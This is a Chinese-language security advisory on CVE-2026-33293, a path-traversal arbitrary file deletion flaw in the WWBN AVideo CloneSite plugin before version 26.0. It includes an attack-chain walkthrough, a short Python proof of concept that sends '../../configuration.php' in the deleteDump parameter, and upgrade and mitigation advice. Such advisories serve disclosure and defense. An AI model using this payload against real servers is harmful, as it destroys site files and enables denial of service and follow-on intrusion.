IPBUF安全漏洞报告
English
CVE-2026-33293 CVSS 8.1 高危

CVE-2026-33293 AVideo任意文件删除漏洞

披露日期: 2026-03-22

漏洞信息

漏洞编号
CVE-2026-33293
漏洞类型
任意文件删除
CVSS评分
8.1 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
WWBN AVideo

相关标签

任意文件删除路径遍历WWBN AVideoDoSCVE-2026-33293

漏洞概述

WWBN AVideo是一个开源视频平台。在26.0版本之前,该平台的CloneSite插件存在严重安全漏洞。具体而言,`plugin/CloneSite/cloneServer.json.php`文件中的`deleteDump`参数未经过任何路径验证便直接传递给`unlink()`函数。拥有有效克隆凭据的攻击者可利用路径遍历序列(如`../../`)删除服务器上的任意文件,包括关键的配置文件`configuration.php`。这可能导致服务完全拒绝(DoS)或通过删除安全关键文件为后续攻击铺平道路。

技术细节

该漏洞的成因是由于服务器端对用户输入缺乏严格的过滤和验证。在受影响的代码逻辑中,`deleteDump`参数被直接用于文件操作函数。攻击者首先需要获取有效的克隆站点凭证(满足PR:L要求),然后构造特殊的HTTP请求。通过在参数中插入路径遍历字符(例如`../../../etc/passwd`或`../../configuration.php`),攻击者能够绕过预期的目录限制。当服务器端脚本执行`unlink()`函数时,它会解析相对路径并删除目标文件。由于配置文件通常包含数据库凭证等敏感信息,一旦被删除或篡改,应用程序将瘫痪或面临更严重的安全风险。此问题已在版本26.0中得到修复。

攻击链分析

STEP 1
1. 侦察与认证
攻击者识别目标为WWBN AVideo平台,并获取有效的克隆站点凭据或用户会话。
STEP 2
2. 构造攻击载荷
攻击者构造包含路径遍历序列(如`../../`)的恶意数据,指向目标敏感文件(如`configuration.php`)。
STEP 3
3. 发送恶意请求
攻击者向`plugin/CloneSite/cloneServer.json.php`发送POST请求,将恶意载荷作为`deleteDump`参数提交。
STEP 4
4. 执行删除操作
服务器端脚本接收参数并直接调用`unlink()`函数,导致指定的任意文件被文件系统删除。
STEP 5
5. 造成影响
关键文件被删除后,应用程序可能崩溃(DoS)或安全机制失效,便于后续攻击。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (replace with actual target) target_url = "http://example.com/plugin/CloneSite/cloneServer.json.php" # Attacker needs valid credentials/session (PR:L requirement) # Assuming session cookie or token is required based on description cookies = { "PHPSESSID": "valid_session_id_here", "user": "valid_user_token_here" } # Payload using path traversal to delete configuration.php payload = { "deleteDump": "../../configuration.php" } try: response = requests.post(target_url, data=payload, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check if file is deleted.") print("[+] Response:", response.text) else: print("[-] Request failed with status code:", response.status_code) except Exception as e: print("[-] An error occurred:", e)

影响范围

WWBN AVideo < 26.0

防御指南

临时缓解措施
建议立即将WWBN AVideo升级到26.0版本以修复此漏洞。如果暂时无法升级,应严格限制对`plugin/CloneSite/cloneServer.json.php`接口的访问权限,仅允许受信任的管理员IP访问,或者临时禁用CloneSite插件功能,直到完成升级。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表